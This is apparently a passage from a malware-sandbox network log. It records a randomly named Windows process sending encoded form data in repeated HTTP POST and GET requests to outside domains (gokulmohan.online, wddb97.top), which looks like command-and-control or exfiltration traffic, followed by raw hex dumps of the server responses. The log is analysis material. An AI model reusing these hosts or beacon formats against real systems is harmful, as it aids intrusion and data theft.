                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c54i1NTYfqhhNAuc1op9SZ4x6jqIffX33WfLc%2BtZeTnm6Mh%2FrZNgDDN4cJVdHJ5Hifnl7DP1Mz%2FvKAvgc5eSFDO0XMlhrEfvL2BMjv%2FM%2BfqfxVR11oJ2RXem6%2Bp1z16l6S7i42Mx4hQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8dbe09be9fc30bbb-DFW
                                                                                        Content-Encoding: gzip
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1316&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=742&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                        Data Raw: 35 38 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8c 56 6d 6f db 36 10 fe ee 5f 71 73 50 60 1b 6c c9 e9 4b 30 38 b2 81 2e 4d d6 00 5d 53 a4 69 87 7e 2a 28 f1 24 b1 a1 48 95 3c d9 71 83 02 f9 1b 05 b6 3f 97 5f 32 1c 29 b9 76 d6 0f 43 80 48 22 ef 8e cf dd f3 f0 ce d9 4f 2f 2e 4e ae 3e bc 39 85 9a 1a bd 1c 65 fc 00 2d 4c b5 18 a3 19 f3 02 0a b9 1c 01 64 0d 92 80 9a a8 9d e2 e7 4e ad 16 e3 c2 1a 42 43 53 da b4 38 86 fe 6b 31 26 bc a1 94 c3 1c 43 51 0b e7 91 16 1d 95 d3 df c6 df a3 18 d1 e0 62 ec 6c 6e c9 ef 78 be be 78 7d 3a 79 7d f1 fc f2 e4 e5 f9 fb d3 68 4f 8a 34 2e 9f ce 9e c0 99 75 b9 92 12 4d 96 c6 45 de f6 b4 d1 08 8c a0 3f b8 f0 3e 38 42 48 08 7e 85 5b 68 85 94 ca 54 f3 d9 31 34 c2 55 ca f0 db d7 60 93 5b b9 d9 b3 39 9c b5 37 f0 78 d6 de 3c b0 78 10 67 67 ef 16 4a 6b 68 ee 1b a1 35 78 61 fc d4 a3 53 e5 31 e4 a2 b8 ae 9c ed 8c 9c 1f 20 e2 31 14 56 5b 37 3f 98
                                                                                        Data Ascii: 58cVmo6_qsP`lK08.M]Si~*($H<q?_2)vCH"O/.N>9e-LdNBCS8k1&CQblnxx}:y}hO4.uME?>8BH~[hT14U`[97x<xggJkh5xaS1 1V[7?
                                                                                        Nov 1, 2024 19:44:47.090347052 CET1142INData Raw: cd f6 02 2c a5 5a c1 2d e4 d6 49 74 d3 dc 12 d9 66 7e d8 de 80 b7 5a 49 38 90 52 0e e6 f5 61 7f da 74 8d aa aa 69 6e ac 6b 84 1e d2 1a 9c 93 a7 d8 ec b8 f8 56 98 c1 cf ab 2f 38 3f 9a 3d da 82 39 3a 3a 3a fe 61 c8 e8 7e a0 4c 69 19 dd 4e 2e e5 11
                                                                                        Data Ascii: ,Z-Itf~ZI8RatinkV/8?=9:::a~LiN.[tn,y6|4m^)6}k=eYlMR<@*_L`N54f9,0%pd\OgO~ak'o/`""+(z[G(,mQ`;#*SC!


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        15192.168.2.450018172.67.185.22804340C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 1, 2024 19:44:48.474070072 CET10824OUTPOST /xh7d/ HTTP/1.1
                                                                                        Host: www.gokulmohan.online
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-us
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 10304
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.gokulmohan.online
                                                                                        Referer: http://www.gokulmohan.online/xh7d/
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Data Raw: 58 62 44 68 47 56 52 3d 6f 5a 4c 58 32 59 51 76 4a 2f 68 50 62 4c 39 63 6c 45 65 43 34 36 63 56 7a 6b 77 70 65 42 55 2f 36 57 4a 6d 38 51 74 73 34 39 59 32 4a 62 4b 50 6d 59 36 6d 33 67 6a 41 53 71 66 79 42 39 36 36 4e 38 71 4e 56 34 50 65 52 75 79 71 47 66 48 41 59 36 72 52 6b 31 2b 38 33 74 77 46 62 4f 46 32 64 6b 65 4b 48 6e 36 58 6e 66 54 4b 4a 4b 6a 4a 6d 52 49 66 77 49 66 58 73 58 56 34 35 53 34 76 68 5a 4e 38 35 45 4c 48 2b 54 62 4d 6a 56 46 64 53 42 76 78 64 2b 41 42 68 53 72 44 32 32 4a 62 37 2f 6a 6d 32 33 6c 74 2b 61 76 63 6a 35 68 43 58 68 49 79 68 75 31 39 6d 74 39 58 75 69 74 58 49 6a 6e 6f 63 79 78 73 39 39 70 66 52 43 72 6f 65 66 78 56 4f 63 4e 55 4f 44 4b 72 56 4c 31 4f 4e 34 6a 61 6e 69 50 74 66 74 35 61 76 38 51 64 57 2b 4d 46 6b 6f 6e 73 65 78 6f 4b 62 4f 4e 41 57 71 5a 61 2b 65 36 63 4a 4e 34 6f 65 6b 6d 79 59 63 45 64 6d 37 35 61 6d 34 43 39 75 70 46 33 4f 43 6d 41 67 74 66 71 34 30 78 45 75 65 34 43 77 64 52 45 6a 74 39 6b 34 6a 69 73 46 58 4e 6f 65 44 2b 2f 78 44 33 71 45 34 [TRUNCATED]
                                                                                        Data Ascii: XbDhGVR=oZLX2YQvJ/hPbL9clEeC46cVzkwpeBU/6WJm8Qts49Y2JbKPmY6m3gjASqfyB966N8qNV4PeRuyqGfHAY6rRk1+83twFbOF2dkeKHn6XnfTKJKjJmRIfwIfXsXV45S4vhZN85ELH+TbMjVFdSBvxd+ABhSrD22Jb7/jm23lt+avcj5hCXhIyhu19mt9XuitXIjnocyxs99pfRCroefxVOcNUODKrVL1ON4janiPtft5av8QdW+MFkonsexoKbONAWqZa+e6cJN4oekmyYcEdm75am4C9upF3OCmAgtfq40xEue4CwdREjt9k4jisFXNoeD+/xD3qE4A3o5xWoNc2nHDHrqdqzubCHXOurRxcxbFXzsn7FomWGbQ0qiV8vQwtxy8nGQ55bUMx20EYI/poMnKeMo5nuf0MdUVGtukZZrAmPf9fmfb5+UsvcZermZImIg9CTw/Hb/CdZZX++/balLGVy3+Vb92YUc4iLeDndeusTPnjEgHgGR9G6+Iv5dscxyI6aZ1NMUeZGJ2sMvGxDB4wcbUHVTOsTUsOqnMf83pWahn6tGJ+B6hnc/xvfnlfp5OnLjywKjk2cRf2y9xyklG7wNI8jxkKJgc5kZg6cvivGZp/nCcFr+8NZVtYvZGA0tuu8Wt4Zk8cxN9BoLHdhZiT9GSBEGD46A8oxrvtIJKeA2RfCGEne2CO1COmbeHtEJ+x+HiUH9UXgIIcXVd2Uq0ClprtlNdnsgXPbZm+AGFnwL0RmsMuC54lD1bK+jAYLuPCvyxKPrQ0bHByZYYvb4GyArGQ6AIJTdBjMYK01bZTn7vetZPuypRq3j5LS+kObZw0YQlcpI8k7L5WYr+IXWOjqs4QLSP6nrt7e5nWfeDdyQwePK0kGJTfUKCO/w67rCEuSzuTs4YgkEj+Aupj2vOnkfHPUR/L8qGGac5f/OEyNFNJhBZpsvFOI2K+9nNLYSeFOt1uNid1D0815N6Q/3oWBHVByfSqcR0ZsoGibVVd [TRUNCATED]
                                                                                        Nov 1, 2024 19:44:49.639130116 CET1236INHTTP/1.1 403 Forbidden
                                                                                        Date: Fri, 01 Nov 2024 18:44:49 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Referrer-Policy: same-origin
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3vjWD25MVEy7ZUnfiBq4G3ol13hgAtEMPPTY5ir%2B%2F4Be1RNjH%2BQPHt9Im7dT0RxVk8VYxmFC28u%2FErpXfZ%2FUcUrZkaWDgmbKsL0gCfBdcpLnM6riUmud%2Fl1syDQREd%2BHw4sZnmgoS0Y%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8dbe09ce6fbd2ca9-DFW
                                                                                        Content-Encoding: gzip
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1077&sent=6&recv=12&lost=0&retrans=0&sent_bytes=0&recv_bytes=10824&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                        Data Raw: 35 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8c 56 6d 6f db 36 10 fe ee 5f 71 73 50 60 1b 6c c9 e9 4b 30 38 b2 81 2e 4d d6 00 5d 53 a4 69 87 7e 2a 28 f1 24 b1 a1 48 95 3c d9 71 83 02 f9 1b 05 b6 3f 97 5f 32 1c 29 b9 76 d6 0f 43 80 48 22 ef 8e cf dd f3 f0 ce d9 4f 2f 2e 4e ae 3e bc 39 85 9a 1a bd 1c 65 fc 00 2d 4c b5 18 a3 19 f3 02 0a b9 1c 01 64 0d 92 80 9a a8 9d e2 e7 4e ad 16 e3 c2 1a 42 43 53 da b4 38 86 fe 6b 31 26 bc a1 94 c3 1c 43 51 0b e7 91 16 1d 95 d3 df c6 df a3 18 d1 e0 62 ec 6c 6e c9 ef 78 be be 78 7d 3a 79 7d f1 fc f2 e4 e5 f9 fb d3 68 4f 8a 34 2e 9f ce 9e c0 99 75 b9 92 12 4d 96 c6 45 de f6 b4 d1 08 8c a0 3f b8 f0 3e 38 42 48 08 7e 85 5b 68 85 94 ca 54 f3 d9 31 34 c2 55 ca f0 db d7 60 93 5b b9 d9 b3 39 9c b5 37 f0 78 d6 de 3c b0 78 10 67 67 ef 16 4a 6b 68 ee 1b a1 35 78 61 fc d4 a3 53 e5 31 e4 a2 b8 ae 9c ed 8c 9c 1f 20 e2 31 14
                                                                                        Data Ascii: 581Vmo6_qsP`lK08.M]Si~*($H<q?_2)vCH"O/.N>9e-LdNBCS8k1&CQblnxx}:y}hO4.uME?>8BH~[hT14U`[97x<xggJkh5xaS1 1
                                                                                        Nov 1, 2024 19:44:49.639153004 CET1152INData Raw: 56 5b 37 3f 98 cd f6 02 2c a5 5a c1 2d e4 d6 49 74 d3 dc 12 d9 66 7e d8 de 80 b7 5a 49 38 90 52 0e e6 f5 61 7f da 74 8d aa aa 69 6e ac 6b 84 1e d2 1a 9c 93 a7 d8 ec b8 f8 56 98 c1 cf ab 2f 38 3f 9a 3d da 82 39 3a 3a 3a fe 61 c8 e8 7e a0 4c 69 19
                                                                                        Data Ascii: V[7?,Z-Itf~ZI8RatinkV/8?=9:::a~LiN.[tn,y6|4m^)6}k=eYlMR<@*_L`N54f9,0%pd\OgO~ak'o/`""+(z[G(,mQ`;#*SC


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        16192.168.2.450019172.67.185.22804340C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 1, 2024 19:44:51.019057035 CET452OUTGET /xh7d/?XbDhGVR=lbj31sdPKdIucqFOkkGE3KM3+04tAjUV11hc/ilEwtgrKZz4woi/xCbjO8SSPcCwKsmvKoPyP7HvBY60bpiIs0q+jugQSLxZIHi4ORfVnf3fP4vxqk9k0cQ=&Qz=BJvp0BdhxXiTCTGP HTTP/1.1
                                                                                        Host: www.gokulmohan.online
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Language: en-us
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Nov 1, 2024 19:44:52.182286024 CET1236INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 01 Nov 2024 18:44:52 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Referrer-Policy: same-origin
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MGjIi6Tab%2F8l3z5J0VGzQ%2FzRLyZtkMg1bkOk5JMBOYK0lf9XnHgQIMuIfCjBe0mBJVCzX%2BQfntbkcnkAH8O6Mrd77ym5w62cAkqo6q4cvLndmAdUvT7yZ9LJhYP488xJ2KYFRpn5aD0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8dbe09de3e80e853-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1370&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=452&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                        Data Raw: 63 61 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 61 74 20 2f 78 68 37 64 2f 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 4e 45 2c 4e 4f 41 52 43 48 49 56 45 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 68 74 6d 6c 20 2a 20 7b 20 70 61 64 64 69 6e 67 3a 30 3b 20 6d 61 72 67 69 6e 3a 30 3b 20 7d 0a 20 20 20 20 62 6f 64 79 20 2a 20 7b 20 70 61 64 64 69 6e 67 3a 31 30 70 78 20 32 30 70 78 3b 20 7d 0a 20 20 20 20 62 6f 64 79 20 2a 20 2a 20 7b 20 70 61 64 64
                                                                                        Data Ascii: ca8<!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <title>Page not found at /xh7d/</title> <meta name="robots" content="NONE,NOARCHIVE"> <style type="text/css"> html * { padding:0; margin:0; } body * { padding:10px 20px; } body * * { padd
                                                                                        Nov 1, 2024 19:44:52.182312965 CET1236INData Raw: 69 6e 67 3a 30 3b 20 7d 0a 20 20 20 20 62 6f 64 79 20 7b 20 66 6f 6e 74 3a 73 6d 61 6c 6c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 23 65 65 65 3b 20 63 6f 6c 6f 72 3a 23 30 30 30 3b 20 7d 0a 20 20 20 20 62 6f 64 79
                                                                                        Data Ascii: ing:0; } body { font:small sans-serif; background:#eee; color:#000; } body>div { border-bottom:1px solid #ddd; } h1 { font-weight:normal; margin-bottom:.4em; } h1 span { font-size:60%; color:#666; font-weight:normal; } tabl
                                                                                        Nov 1, 2024 19:44:52.182332039 CET1236INData Raw: 5a 49 48 69 34 4f 52 66 56 6e 66 33 66 50 34 76 78 71 6b 39 6b 30 63 51 3d 26 61 6d 70 3b 51 7a 3d 42 4a 76 70 30 42 64 68 78 58 69 54 43 54 47 50 3c 2f 74 64 3e 0a 20 20 20 20 20 20 3c 2f 74 72 3e 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 3c 74
                                                                                        Data Ascii: ZIHi4ORfVnf3fP4vxqk9k0cQ=&amp;Qz=BJvp0BdhxXiTCTGP</td> </tr> <tr> <th>Raised by:</th> <td>django.views.static.serve</td> </tr> </table> </div> <div id="info"> <p> Using t
                                                                                        Nov 1, 2024 19:44:52.182352066 CET460INData Raw: 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 3c 2f 6f 6c 3e 0a 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20
                                                                                        Data Ascii: </li> </ol> <p> The current path, <code>xh7d/</code>, matched the last one. </p> </div> <div id="explanation"> <p> Youre seeing


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        17192.168.2.450020206.119.82.172804340C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 1, 2024 19:44:57.412718058 CET701OUTPOST /a3g3/ HTTP/1.1
                                                                                        Host: www.wddb97.top
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-us
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 204
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.wddb97.top
                                                                                        Referer: http://www.wddb97.top/a3g3/
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Data Raw: 58 62 44 68 47 56 52 3d 39 45 62 79 4e 72 61 76 48 66 56 4f 54 52 51 66 50 44 69 33 76 54 74 64 4b 6e 73 4f 6f 66 71 46 6f 4e 32 44 5a 68 30 67 67 2b 6a 68 5a 73 71 32 71 31 7a 65 70 4f 41 76 45 62 39 73 5a 6a 32 7a 78 61 79 42 37 6d 61 2b 55 31 55 46 41 6e 70 6f 62 6d 64 6c 4b 30 55 68 38 48 31 30 41 4b 50 79 47 6b 33 79 4c 4f 2b 7a 53 58 71 46 36 37 67 34 69 4c 6d 47 48 59 56 6a 64 51 4b 7a 5a 70 36 58 55 38 6f 45 33 36 2f 6a 64 71 67 41 34 4f 6c 6d 47 45 49 47 58 50 77 2b 34 7a 50 2b 63 53 51 64 63 45 4d 31 72 4f 4e 48 55 6a 74 54 34 57 7a 70 39 5a 75 35 41 64 54 70 44 76 62 65 77 6f 59 70 74 67 3d 3d
                                                                                        Data Ascii: XbDhGVR=9EbyNravHfVOTRQfPDi3vTtdKnsOofqFoN2DZh0gg+jhZsq2q1zepOAvEb9sZj2zxayB7ma+U1UFAnpobmdlK0Uh8H10AKPyGk3yLO+zSXqF67g4iLmGHYVjdQKzZp6XU8oE36/jdqgA4OlmGEIGXPw+4zP+cSQdcEM1rONHUjtT4Wzp9Zu5AdTpDvbewoYptg==
                                                                                        Nov 1, 2024 19:44:58.363006115 CET302INHTTP/1.1 404 Not Found
                                                                                        Server: nginx
                                                                                        Date: Fri, 01 Nov 2024 18:44:58 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 138
                                                                                        Connection: close
                                                                                        ETag: "66aa3a46-8a"
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        18192.168.2.450021206.119.82.172804340C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 1, 2024 19:44:59.957331896 CET721OUTPOST /a3g3/ HTTP/1.1
                                                                                        Host: www.wddb97.top
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-us
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 224
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.wddb97.top
                                                                                        Referer: http://www.wddb97.top/a3g3/
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Data Raw: 58 62 44 68 47 56 52 3d 39 45 62 79 4e 72 61 76 48 66 56 4f 4a 77 67 66 4e 6b 4f 33 6a 6a 74 65 57 33 73 4f 68 2f 72 4f 6f 4e 36 44 5a 6a 59 77 67 4d 33 68 5a 4d 61 32 70 33 4c 65 6c 75 41 76 63 72 39 31 47 7a 33 39 78 61 2f 38 37 6a 36 2b 55 31 77 46 41 69 74 6f 62 58 64 6d 4c 6b 55 6a 7a 6e 31 32 59 71 50 79 47 6b 33 79 4c 4f 71 5a 53 58 79 46 35 49 34 34 6a 71 6d 46 47 59 56 67 61 51 4b 7a 64 70 36 62 55 38 70 68 33 37 54 46 64 70 49 41 34 4c 42 6d 49 31 4a 30 43 2f 77 38 79 54 4f 73 53 7a 39 4b 52 56 70 4e 30 66 78 36 64 67 46 4f 35 51 2b 7a 73 6f 50 75 53 64 33 61 65 6f 53 71 39 72 6c 67 32 72 68 73 63 30 54 33 44 39 55 6a 62 4d 30 43 78 33 45 62 4f 64 77 3d
                                                                                        Data Ascii: XbDhGVR=9EbyNravHfVOJwgfNkO3jjteW3sOh/rOoN6DZjYwgM3hZMa2p3LeluAvcr91Gz39xa/87j6+U1wFAitobXdmLkUjzn12YqPyGk3yLOqZSXyF5I44jqmFGYVgaQKzdp6bU8ph37TFdpIA4LBmI1J0C/w8yTOsSz9KRVpN0fx6dgFO5Q+zsoPuSd3aeoSq9rlg2rhsc0T3D9UjbM0Cx3EbOdw=
                                                                                        Nov 1, 2024 19:45:00.930490017 CET302INHTTP/1.1 404 Not Found
                                                                                        Server: nginx
                                                                                        Date: Fri, 01 Nov 2024 18:45:00 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 138
                                                                                        Connection: close
                                                                                        ETag: "66aa3a46-8a"
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        19192.168.2.450022206.119.82.172804340C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 1, 2024 19:45:02.507702112 CET10803OUTPOST /a3g3/ HTTP/1.1
                                                                                        Host: www.wddb97.top
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-us
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 10304
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.wddb97.top
                                                                                        Referer: http://www.wddb97.top/a3g3/
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Data Raw: 58 62 44 68 47 56 52 3d 39 45 62 79 4e 72 61 76 48 66 56 4f 4a 77 67 66 4e 6b 4f 33 6a 6a 74 65 57 33 73 4f 68 2f 72 4f 6f 4e 36 44 5a 6a 59 77 67 4d 76 68 59 39 36 32 76 67 6e 65 6b 75 41 76 43 62 39 77 47 7a 32 68 78 61 33 34 37 6a 32 41 55 33 34 46 42 45 52 6f 64 6c 31 6d 45 6b 55 6a 32 58 31 31 41 4b 50 6e 47 6b 47 61 4c 4f 36 5a 53 58 79 46 35 4f 55 34 6b 37 6d 46 45 59 56 6a 64 51 4b 33 5a 70 36 33 55 39 4d 63 33 37 58 7a 64 59 6f 41 34 72 52 6d 45 6e 68 30 65 76 77 36 31 54 50 70 53 7a 77 4e 52 56 30 30 30 66 56 55 64 6a 5a 4f 39 47 6e 71 32 5a 43 31 47 66 2f 2f 62 72 4b 30 31 62 4a 43 35 37 49 52 59 6b 48 6a 51 73 67 70 52 76 68 49 69 46 59 6c 62 4b 66 63 50 61 74 76 6c 32 75 4a 51 4c 41 6e 79 31 6c 47 66 70 71 2b 42 54 79 2b 51 5a 52 38 50 6e 49 54 75 35 71 70 65 4e 70 6d 50 38 32 30 55 31 51 54 42 65 33 7a 54 34 4e 6b 36 53 38 6b 51 71 68 49 59 42 4a 34 46 38 33 30 4b 55 52 56 36 63 67 6d 57 66 43 4c 54 4b 75 74 78 36 37 4c 59 4d 45 62 33 50 78 35 67 50 4f 72 41 78 41 2b 63 37 34 73 2b 48 [TRUNCATED]
                                                                                        Data Ascii: 